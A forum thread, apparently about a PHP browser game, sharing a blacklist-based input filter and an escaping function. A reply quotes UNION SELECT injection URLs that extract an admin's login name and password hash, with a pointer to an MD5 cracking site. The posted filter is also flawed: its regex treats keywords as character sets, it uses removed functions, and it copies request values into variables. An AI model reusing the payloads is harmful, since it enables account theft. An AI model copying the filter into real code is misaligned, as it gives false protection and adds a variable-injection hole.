Some people here will say this don't work and some will actually try it out and may even like to use it. It's all up to you and whoever decides to give it a shot.
1.) Take the below code and paste it into a .php file called whatever you want. Here I will use thefile.php.
function replace_meta_chars($string)
{
return @eregi_replace("([<])|([>])|([*])|([|])|([;])|([`])|([-])|([\])|([{])|([}])|([+])|([uNION])|([sELECT])|([DROP])|([WHERE])|([EMPTY])|([FLUSH])|([iNSERT])","",$string);
}
while(list($keyx,$valuex) = each($_REQUEST))
{
if(eregi("([<])|([>])|([*])|([|])|([;])|([`])|([-])|([\])|([{])|([}])|([+])",$valuex))
{
print "
Attack Attempt
!!! WARNING !!!
Malicious Code Detected! The staff has been notified.
Currently, we only allow the characters of ' / ' and ' ? '.
<< Explore";
event_add(1,"{$ir['username']} has been flagged for malicious code.
Char Details
Chars Used: $valuex",$c);
$h->endpage();
exit();
}
}
reset ($_REQUEST); while(list($keyx,$valuex) = each($_REQUEST))
{
${$keyx} = replace_meta_chars($valuex);
}
?>
2.) Place the following on the very top of whatever page you plan to use it on.
require "thefile.php";
EXAMPLE:
$atkpage=1;
include "globals.php";
require "thefile.php";
print "YOUR PAGE CONTENT";
$h->endpage();
?>
If you plan to use it on all pages, then place it in either your globals or header file. I don't remember where I seen this code, but it is free to use and alot of games are using it right now as some of you may have seen already trying to hack.
To allow/disallow characters, just remove or add them from the above script.....example below of what to look for.
return
@eregi_replace("([<])|([>])|([*])|([|])|([;])|([`])|([-])|([\])|([{])|([}])|([+])|([uNION])|([sELECT])|([DROP])|([WHERE])|([EMPTY])|([FLUSH])|([iNSERT])","",$string);
if(eregi("([<])|([>])|([*])|([|])|([;])|([`])|([-])|([\])|([{])|([}])|([+])",$valuex))
For a little more added protection. Stick the following in your globals.php file.
function anti_inject($campo)
{
foreach($campo as $key => $val)
{
$val = mysql_real_escape_string($val);
// store it back into the array
$campo[$key] = $val;
}
return $campo; //Returns the the var clean
}
//the next two lines make sure all post and get vars are filtered through this function
$_POST = anti_inject($_POST);
$_GET = anti_inject($_GET);
Enjoy!
I saw the Hack UID=1 's passcode with decoder they show as follows;
Code: Select all
this is the login name of id [1]
Code:
?reply=0+union+all+select+login_name,login_name,login_name,login_name,lo ? gin_name,login_name,login_name,login_name,login_name,login_name,logi ?n_name,login_name,login_name+from+users+where+userid=1 ******************
this is the password of [1] but will give you a long code
Code:
?reply=0+union+all+select+userpass,userpass,userpass,userpass,userpass%2 ? Cuserpass,userpass,userpass,userpass,userpass,userpass,userpass,us ?erpass+from+users+where+userid=1 **************
and The pass cracker need to go " http://www.md5decrypter.com " for decrypts passcode,
I want to know, can that Code you write to adding at global.php prevent that kind of injection?
Thanks,
